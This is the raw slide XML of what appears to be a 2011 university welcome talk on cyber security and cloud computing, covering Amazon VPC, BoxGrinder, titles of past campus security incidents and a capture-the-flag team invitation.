      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</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211" y="3355974"/>
            <a:ext cx="6618289" cy="3391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20415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Amazon Virtual Private Cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317500" y="925513"/>
            <a:ext cx="8572500" cy="4745915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Amazon Virtual Private Cloud (Amazon VPC) lets you provision a private, isolated section of the Amazon Web Services (AWS) Cloud where you can launch AWS resources in a virtual network that you define. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Amazon VPC, you can define a virtual network topology that closely resembles a traditional network that you might operate in your own datacenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ffload of sudden demand in your private cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Compromised VPC can access your private cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCCCC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232324636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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>New Initiatives in Supporting Integrated Cloud Computing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="2160591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many companies are creating/selling tools for managing integrated cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>BoxGrinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> is a set of tools used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>building/deploying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>appliances (virtual machines) for various platforms (KVM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Xen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, VMware, EC2).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="BoxGrinder Bui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37" y="3536950"/>
            <a:ext cx="8659451"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342821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the Talk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="938213"/>
            <a:ext cx="8410575" cy="8568500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cyber security is pervasive, ubiquitous, necessary, serious, fun, and profitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review of Security Incidents at UCCS/EAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacking Midterm for Grade and Fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacking  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTFwiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for page rank promotion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSL Security Breach while online final is on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security issues in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>obile  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) app and Studentfootprint.com portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security in Cloud Computing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>earn fancy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xaas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> terms: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>saas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>paas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>caas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>maas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CyberWar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Competition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Experiences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23155141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2050" name="Picture 5" descr="uclionLogo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="457200"/>
            <a:ext cx="1304925" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2514600"/>
            <a:ext cx="1320800" cy="3505200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1016000 w 832"/>
              <a:gd name="T1" fmla="*/ 0 h 2208"/>
              <a:gd name="T2" fmla="*/ 1168400 w 832"/>
              <a:gd name="T3" fmla="*/ 1219200 h 2208"/>
              <a:gd name="T4" fmla="*/ 101600 w 832"/>
              <a:gd name="T5" fmla="*/ 2895599 h 2208"/>
              <a:gd name="T6" fmla="*/ 558800 w 832"/>
              <a:gd name="T7" fmla="*/ 3505200 h 2208"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 832"/>
              <a:gd name="T13" fmla="*/ 0 h 2208"/>
              <a:gd name="T14" fmla="*/ 832 w 832"/>
              <a:gd name="T15" fmla="*/ 2208 h 2208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="832" h="2208">
                <a:moveTo>
                  <a:pt x="640" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="736" y="232"/>
                  <a:pt x="832" y="464"/>
                  <a:pt x="736" y="768"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="1072"/>
                  <a:pt x="128" y="1584"/>
                  <a:pt x="64" y="1824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2064"/>
                  <a:pt x="176" y="2136"/>
                  <a:pt x="352" y="2208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="152400">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5715000" y="2514600"/>
            <a:ext cx="1320800" cy="3505200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1016000 w 832"/>
              <a:gd name="T1" fmla="*/ 0 h 2208"/>
              <a:gd name="T2" fmla="*/ 1168400 w 832"/>
              <a:gd name="T3" fmla="*/ 1219200 h 2208"/>
              <a:gd name="T4" fmla="*/ 101600 w 832"/>
              <a:gd name="T5" fmla="*/ 2895599 h 2208"/>
              <a:gd name="T6" fmla="*/ 558800 w 832"/>
              <a:gd name="T7" fmla="*/ 3505200 h 2208"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 832"/>
              <a:gd name="T13" fmla="*/ 0 h 2208"/>
              <a:gd name="T14" fmla="*/ 832 w 832"/>
              <a:gd name="T15" fmla="*/ 2208 h 2208"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="832" h="2208">
                <a:moveTo>
                  <a:pt x="640" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="736" y="232"/>
                  <a:pt x="832" y="464"/>
                  <a:pt x="736" y="768"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="640" y="1072"/>
                  <a:pt x="128" y="1584"/>
                  <a:pt x="64" y="1824"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2064"/>
                  <a:pt x="176" y="2136"/>
                  <a:pt x="352" y="2208"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="152400">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Oval 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2065589">
            <a:off x="3505200" y="5334000"/>
            <a:ext cx="990600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Oval 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19534411" flipH="1">
            <a:off x="4800600" y="5334000"/>
            <a:ext cx="990600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2055" name="Picture 4" descr="uclionOsamaLogo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="457200"/>
            <a:ext cx="2438400" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="uclionOsamaLogoRight"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="457200"/>
            <a:ext cx="2438400" cy="3335338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2057" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="426292" y="4245739"/>
            <a:ext cx="8534400" cy="2603790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Come Join U-C-Lion Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9/12/2011 Monday Night EN109 8:10-8:30pm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
